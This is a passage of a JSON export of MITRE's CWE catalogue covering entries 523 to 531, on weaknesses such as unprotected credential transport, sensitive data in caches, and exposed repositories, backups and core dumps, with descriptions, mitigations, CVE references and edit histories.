password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0944"},{"Reference":"CVE-2005-3435","Description":"product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435"},{"Reference":"CVE-2005-0408","Description":"chain: product generates predictable MD5 hashes using a constant value combined with username, allowing authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0408"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A7","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"102"}},{"attr":{"@_CAPEC_ID":"474"}},{"attr":{"@_CAPEC_ID":"50"}},{"attr":{"@_CAPEC_ID":"509"}},{"attr":{"@_CAPEC_ID":"551"}},{"attr":{"@_CAPEC_ID":"555"}},{"attr":{"@_CAPEC_ID":"560"}},{"attr":{"@_CAPEC_ID":"561"}},{"attr":{"@_CAPEC_ID":"600"}},{"attr":{"@_CAPEC_ID":"644"}},{"attr":{"@_CAPEC_ID":"645"}},{"attr":{"@_CAPEC_ID":"652"}},{"attr":{"@_CAPEC_ID":"653"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"523":{"attr":{"@_ID":"523","@_Name":"Unprotected Transport of Credentials","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"522","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"312","@_View_ID":"1000"}}]},"Background_Details":{"Background_Detail":"SSL (Secure Socket Layer) provides data confidentiality and integrity to HTTP. By encrypting HTTP messages, SSL protects from attackers eavesdropping or altering message contents."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Operation","System Configuration"],"Description":"Enforce SSL use for the login page or any page used to transmit user credentials or other sensitive information. Even if the entire site does not use SSL, it MUST use SSL for login. Additionally, to help prevent phishing attacks, make sure that SSL serves the login page. SSL allows the user to verify the identity of the server to which they are connecting. If the SSL serves login page, the user can be certain they are talking to the proper end system. A phishing attack would typically redirect a user to a site that does not have a valid trusted server certificate issued from an authorized supplier."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"102"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships, Type"}]}},"524":{"attr":{"@_ID":"524","@_Name":"Use of Cache Containing Sensitive Information","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses a cache that contains sensitive information, but the cache can be read by an actor outside of the intended control sphere.","Extended_Description":"Applications may use caches to improve efficiency when communicating with remote entities or performing intensive calculations. A cache maintains a pool of objects, threads, connections, pages, financial data, passwords, or other resources to minimize the time it takes to initialize and access these resources. If the cache is accessible to unauthorized actors, attackers can read the cache and obtain this sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect information stored in cache."},{"Phase":"Architecture and Design","Description":"Do not store unnecessarily sensitive information in the cache."},{"Phase":"Architecture and Design","Description":"Consider using encryption in the cache."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"204"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Caching","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Caching","attr":{"@_Date":"2020-02-24"}}]}},"525":{"attr":{"@_ID":"525","@_Name":"Use of Web Browser Cache Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"524","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Browsers often store information in a client-side cache, which can leave behind sensitive information for other users to find and exploit, such as passwords or credit card numbers. The locations at most risk include public terminals, such as those in libraries and Internet cafes."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Protect information stored in cache."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use a restrictive caching policy for forms and web pages that potentially contain sensitive information."},{"Phase":"Architecture and Design","Description":"Do not store unnecessarily sensitive information in the cache."},{"Phase":"Architecture and Design","Description":"Consider using encryption in the cache."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A2","Entry_Name":"Broken Access Control","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Browser Caching","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Browser Caching","attr":{"@_Date":"2020-02-24"}}]}},"526":{"attr":{"@_ID":"526","@_Name":"Exposure of Sensitive Information Through Environmental Variables","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Environmental variables may contain sensitive information about a remote server.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"497","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Protect information stored in environment variable from being exposed to the user."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Environmental Variables","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Environmental Variables","attr":{"@_Date":"2020-02-24"}}]}},"527":{"attr":{"@_ID":"527","@_Name":"Exposure of Version-Control Repository to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.","Extended_Description":"Version control repositories such as CVS or git store version-specific metadata and other details within subdirectories. If these subdirectories are stored on a web server or added to an archive, then these could be used by an attacker. This information may include usernames, filenames, path root, IP addresses, and detailed \\"diff\\" data about how files have been changed - which could reveal source code snippets that were never intended to be made public.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Operation","Distribution","System Configuration"],"Description":"Recommendations include removing any CVS directories and repositories from the production server, disabling the use of remote CVS repositories, and ensuring that the latest CVS patches and version updates have been performed."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through CVS Repository","attr":{"@_Date":"2009-12-28"}},{"#text":"Exposure of CVS Repository to an Unauthorized Control Sphere","attr":{"@_Date":"2020-02-24"}}]}},"528":{"attr":{"@_ID":"528","@_Name":"Exposure of Core Dump File to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Read Files or Directories"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Protect the core dump files from unauthorized access."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM06-C","Entry_Name":"Ensure that sensitive data is not written out to disk"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Core Dump Files","attr":{"@_Date":"2009-12-28"}}}},"529":{"attr":{"@_ID":"529","@_Name":"Exposure of Access Control List Files to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere.","Extended_Description":"Exposure of these access control list files may give the attacker information about the configuration of the site or system. This information may then be used to bypass the intended security policy or identify trusted systems from which an attack can be launched.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":["Read Application Data","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"System Configuration","Description":"Protect access control list files."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Access Control List Files","attr":{"@_Date":"2009-12-28"}}}},"530":{"attr":{"@_ID":"530","@_Name":"Exposure of Backup File to an Unauthorized Control Sphere","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A backup file is stored in a directory or archive that is made accessible to unauthorized actors.","Extended_Description":"Often, older backup files are renamed with an extension such as .~bk to distinguish them from production files. The source code for old files that have been renamed in this manner and left in the webroot can often be retrieved. This renaming may have been performed automatically by the web server, or manually by the administrator.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"At a minimum, an attacker who retrieves this file would have all the information contained in it, whether that be database calls, the format of parameters accepted by the application, or simply information regarding the architectural structure of your site."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Policy","Description":"Recommendations include implementing a security policy within your organization that prohibits backing up web application source code in the webroot."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"}],"Previous_Entry_Name":{"#text":"Information Leak Through Backup (.~bk) Files","attr":{"@_Date":"2009-12-28"}}}},"531":{"attr":{"@_ID":"531","@_Name":"Inclusion of Sensitive Information in Test Code","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Accessible test applications can pose a variety of security risks. Since developers or administrators rarely consider that someone besides themselves would even know about the existence of these applications, it is common for them to contain sensitive information or functions.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"540","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Testing"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Distribution","Installation"],"Description":"Remove test code before deploying the application into production."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Examples of common issues with test applications include administrative functions, listings of usernames, passwords or session identifiers and information about the system, server or application configuration."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP28","Entry_Name":"Unexpected access points"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, 